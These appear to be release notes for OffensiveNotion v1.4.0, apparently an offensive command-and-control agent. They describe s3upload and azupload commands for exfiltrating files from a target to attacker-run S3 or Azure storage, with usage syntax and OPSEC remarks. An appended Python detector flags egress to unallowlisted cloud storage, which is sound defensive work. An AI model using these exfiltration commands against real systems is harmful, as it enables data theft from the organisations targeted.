v1.4.0: "Toledo"
Welcome back! In v1.4.0, aka "Toledo", we wanted to add some much-needed features to ON.
ls
At long last, ls is now a native command! You can enumerate directories without needing to resort to the shell.
Cloud Upload
Finally! A way to exfiltrate data from the target. It turns out Notion has no native file upload capability. What the Notion app does in the background is hand the file off to S3, where it will eventually reside. So to get uploads working in OffensiveNotion, we've implemented cloud upload ourselves in 2 commands: s3upload and azupload, supporting S3 and Azure Blob Storage, respectively.
Now, to use these, there's a bit of preparation necessary, and the commands require some sensitive information to be sent to the agent. But we don't store that information in memory after the commands have been run. That makes the commands more verbose, but also more OPSEC safe.
azupload
Usage: azupload storage_account access_key container_name file
To use Azure Storage, you'll need to create an Azure Storage Account with public access enabled, then create a container that allows anonymous read. You don't technically have to use anonymous read; it'll just make the links in ON easier to follow. But if you want to maintain better access control, the upload will still function.
s3upload
Usage: s3upload aws_access_key_id aws_secret_access_key region bucket_name file
For S3, you'll want to create an IAM user with S3 write permissions for a new bucket. The access key ID and secret access key are sent, along with the region, bucket name, and the file to upload. The file is set with an anonymous read ACL for ease of access, so beware of the URL and who is accessing it!
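From the defender's side, both commands send data to a storage account or bucket the organisation does not own. The following is an added example, not part of OffensiveNotion or these release notes: it flags egress to S3 and Azure Blob endpoints that are not on an allowlist. The event shape, the allowlist, and all sample hostnames are constructed assumptions, and it assumes the destination hostname is visible in proxy or DNS logs.

```python
import re

# Constructed sample events: (source host, destination hostname, bytes sent).
# Assumption: egress proxy or DNS logs have been reduced to this shape.
SAMPLE_EVENTS = [
    ("ws-014", "corp-backups.s3.eu-west-1.amazonaws.com", 48_000_000),
    ("ws-022", "example-drop-bucket.s3.us-east-2.amazonaws.com", 7_300_000),
    ("ws-022", "examplestorageacct.blob.core.windows.net", 2_100_000),
    ("ws-031", "s3.us-east-1.amazonaws.com", 900_000),  # path-style: no bucket in host
    ("ws-040", "api.notion.com", 12_000),               # not a storage endpoint
]

# Hypothetical allowlist of storage the organisation actually owns.
SANCTIONED = {("s3", "corp-backups"), ("azure", "corpfiles")}

# S3 path-style host (s3.<region>.amazonaws.com) and virtual-hosted host (<bucket>.s3...).
S3_PATH = re.compile(r"^s3[.-](?:[a-z0-9-]+\.)*amazonaws\.com$")
S3_VHOST = re.compile(r"^(?P<name>.+)\.s3[.-](?:[a-z0-9-]+\.)*amazonaws\.com$")
# Azure Blob: <storage_account>.blob.core.windows.net
AZ_BLOB = re.compile(r"^(?P<name>[a-z0-9]{3,24})\.blob\.core\.windows\.net$")

def classify(hostname):
    """Return (service, name or None), or None if the host is not a storage endpoint."""
    h = hostname.lower().rstrip(".")
    if S3_PATH.match(h):
        return ("s3", None)
    m = S3_VHOST.match(h)
    if m:
        return ("s3", m.group("name"))
    m = AZ_BLOB.match(h)
    if m:
        return ("azure", m.group("name"))
    return None

def flag_unsanctioned(events, sanctioned=SANCTIONED):
    """List storage destinations that are unknown or cannot be identified."""
    findings = []
    for src, host, sent in events:
        dest = classify(host)
        if dest is None or dest in sanctioned:
            continue
        reason = "bucket not identifiable (path-style)" if dest[1] is None else "not in allowlist"
        findings.append({"src": src, "service": dest[0], "name": dest[1],
                         "bytes": sent, "reason": reason})
    return findings

if __name__ == "__main__":
    for finding in flag_unsanctioned(SAMPLE_EVENTS):
        print(finding)
```

Path-style S3 requests hide the bucket name inside TLS, so those hits need endpoint process telemetry to resolve.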